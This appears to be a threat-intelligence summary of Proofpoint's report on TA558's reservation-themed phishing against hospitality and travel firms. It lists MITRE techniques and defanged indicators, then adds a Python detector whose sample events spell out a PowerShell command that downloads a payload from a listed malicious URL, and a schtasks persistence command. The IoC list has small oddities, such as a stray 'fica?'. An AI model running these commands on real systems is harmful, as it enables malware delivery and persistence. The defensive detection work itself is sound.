TA558 Threat Actor Targets Hospitality & Travel | Proofpoint US

TA558 is a financially motivated threat actor targeting hospitality, hotel, and travel organizations, predominantly in Latin America, with activity in Western Europe and North America. From 2018 onward, Proofpoint observed TA558 repeatedly using reservation-themed lures and a mix of malware payloads (including Loda, Vjw0rm, Revenge RAT, AsyncRAT) while evolving delivery methods—shifting to URLs and container files in 2022 to bypass macro protections. #TA558 #RevengeRAT #Loda #Vjw0rm #AsyncRAT #njRAT #Proofpoint #Hospitality #Travel

Keypoints

  • TA558 is a financially motivated actor targeting hospitality, hotel, and travel organizations, primarily in Latin America, with additional activity in Western Europe and North America.
  • Since 2018, TA558 has used a variety of malware payloads (Loda, Vjw0rm, Revenge RAT, AsyncRAT, njRAT, and others) and repeats certain campaign patterns and infrastructure across years.
  • In 2022, TA558 increased operational tempo and pivoted away from macro-enabled Office documents to URLs and container files (RAR/ISO) to deliver payloads, likely to evade macro-blocking by Microsoft.
  • Language use is strongly skewed toward Portuguese and Spanish (over 90%), with occasional English lures and weekly language switching that shifts targeting by language.
  • TA558 leverages attacker-owned infrastructure but also compromises hotel websites to host payloads and C2 traffic, using tactics like scheduled tasks for persistence and PowerShell/MSHTA in delivery chains.
  • Malware payloads frequently include Loda, Vjw0rm, Revenge RAT, AsyncRAT, and njRAT, with evidence of elaborate delivery chains and helper scripts appearing in 2021.

MITRE Techniques

  • [T1566.001] Phishing – Emails with malicious Word attachments exploiting Equation Editor vulnerabilities (e.g., CVE-2017-11882) to download and install malware. “Proofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and install malware.”
  • [T1204.002] User Execution – Macro-enabled Office documents enabling the download and installation of malware. “In 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with macros, typically VBA macros, to download and install malware.”
  • [T1059.001] PowerShell – Use of PowerShell to download and execute payloads; “The PowerPoint attachment that… executed a PowerShell script to download a VBS payload from an actor-controlled domain.”
  • [T1105] Ingress Tool Transfer – Downloading payloads from remote URLs; “PowerShell script to download a VBS payload from an actor-controlled domain.” (illustrates downloading external payloads).
  • [T1036] Masquerading – Adversaries mimic legitimate service names to appear trustworthy; “the group mimics technology service names to appear legitimate.”
  • [T1071.001] Web Protocols – Use of web-based C2 and hosted payloads; “Proofpoint observed TA558 leverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery and C2 traffic.”

Indicators of Compromise

  • [Domain] C2 domains – quedabesouro[.]ddns[.]net, fica? queda212[.]duckdns[.]org
  • [Domain] C2 domains – 3030pp[.]hopto[.]org, 4success[.]zapto[.]org, success20[.]hopto[.]org
  • [Domain] C2 domains – vemvemserver[.]duckdns[.]org, msin[.]hopto[.]org, cdtpitbull[.]hopto[.]org
  • [Domain] C2 domains – 111234cdt[.]ddns[.]net, cdt2021[.]zapto[.]org
  • [IP] IP – 38[.]132[.]101[.]45 (Revenge RAT C2 IP)
  • [SHA256] 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910, 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6
  • [File] Filename – RESERVA.docx, 1000172347.xlsm
  • [URL] Payload URL – hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc, hxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txt
  • [URL] Payload URL – hxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txt, hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg
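As an added example (not code from Proofpoint or the report itself), the delivery chain summarised under MITRE Techniques above and the defanged indicators in this list can be turned into a small endpoint detection: refang the `[.]`/`hxxp` notation, then flag process-creation events where an Office application spawns PowerShell or MSHTA, PowerShell fetches a `.vbs`, `schtasks` creates a task, or a command line references a listed host. The sample events, the `classify_event` name and the event fields are constructed assumptions; only the three indicators are taken from the page.

```python
import re

# Subset of the report's defanged indicators (copied from the IoC list above).
DEFANGED_IOCS = [
    "hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc",
    "hxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txt",
    "vemvemserver[.]duckdns[.]org",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"powershell.exe", "mshta.exe"}
DOWNLOAD_VERBS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|iwr\b|wget\b|curl\b")


def refang(ioc: str) -> str:
    """Undo the [.] / [:] / [://] / hxxp defanging used in the IoC list."""
    s = ioc.replace("[.]", ".").replace("[://]", "://").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s)


def ioc_hosts(iocs=DEFANGED_IOCS) -> set[str]:
    """Extract the host part of each refanged indicator for substring matching."""
    return {refang(i).split("//")[-1].split("/")[0].lower() for i in iocs}


def classify_event(parent: str, image: str, cmdline: str, iocs=DEFANGED_IOCS) -> list[str]:
    """Return the reasons a process-creation event matches the TA558 delivery chain."""
    parent_l, image_l, cmd_l = parent.lower(), image.lower(), cmdline.lower()
    reasons = []
    if parent_l in OFFICE_PARENTS and image_l in LOLBINS:      # Office -> PowerShell/MSHTA
        reasons.append("office-spawns-" + image_l.split(".")[0])
    if image_l == "powershell.exe" and DOWNLOAD_VERBS.search(cmd_l) and ".vbs" in cmd_l:
        reasons.append("powershell-downloads-vbs")              # PowerShell pulling a VBS stage
    if image_l == "schtasks.exe" and "/create" in cmd_l:
        reasons.append("schtasks-persistence")                  # scheduled task persistence
    if any(h in cmd_l for h in ioc_hosts(iocs)):
        reasons.append("known-ta558-host")                      # command line names a listed host
    return reasons


# Constructed sample events (parent image, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WINWORD.EXE", "powershell.exe",
     "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
     "'https://brasilnativopousada.com.br/Final.txt','C:\\Users\\Public\\r.vbs')\""),
    ("explorer.exe", "schtasks.exe", "schtasks /create /sc minute /mo 5 /tn Update /tr C:\\Users\\Public\\r.vbs"),
    ("explorer.exe", "powershell.exe", "powershell -c Get-Date"),
]

if __name__ == "__main__":
    for parent, image, cmd in SAMPLE_EVENTS:
        print(image, "->", classify_event(parent, image, cmd) or ["benign"])
```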

Read more: https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel